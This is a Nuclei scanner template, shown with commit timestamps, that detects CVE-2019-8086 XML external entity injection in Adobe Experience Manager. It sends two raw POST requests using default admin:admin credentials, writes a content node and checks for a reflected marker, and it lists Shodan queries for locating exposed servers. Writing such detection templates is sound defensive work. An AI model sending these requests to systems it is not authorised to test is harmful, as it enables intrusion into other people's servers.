nuclei-templates/http/cves/2019/CVE-2019-8086.yaml

67 lines
2.4 KiB
YAML
Raw Normal View History

2022-09-24 22:29:35 +00:00
id: CVE-2019-8086
info:
name: Adobe Experience Manager - XML External Entity Injection
2022-09-24 22:29:35 +00:00
author: DhiyaneshDk
severity: high
description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 12:53:28 +00:00
remediation: |
Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks.
2022-09-24 22:29:35 +00:00
reference:
- https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086
- https://nvd.nist.gov/vuln/detail/CVE-2019-8086
2023-07-11 19:49:27 +00:00
- https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
2022-10-08 02:07:59 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-8086
cwe-id: CWE-611
2023-07-11 19:49:27 +00:00
epss-score: 0.14515
2023-08-31 11:46:18 +00:00
epss-percentile: 0.95041
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:*
2022-10-08 06:48:14 +00:00
metadata:
max-request: 2
2023-09-06 12:53:28 +00:00
vendor: adobe
product: experience_manager
2022-10-08 06:48:14 +00:00
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
2022-09-24 22:29:35 +00:00
tags: cve,cve2019,aem,adobe
2022-09-24 22:32:29 +00:00
http:
2022-09-24 22:29:35 +00:00
- raw:
- |
POST /content/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
sling:resourceType=fd/af/components/guideContainer
- |
POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-09-26 06:45:17 +00:00
- '<afData>ABC<afBoundData/>'
2022-09-24 22:29:35 +00:00
- type: word
part: header
words:
- application/json
- type: status
status:
- 200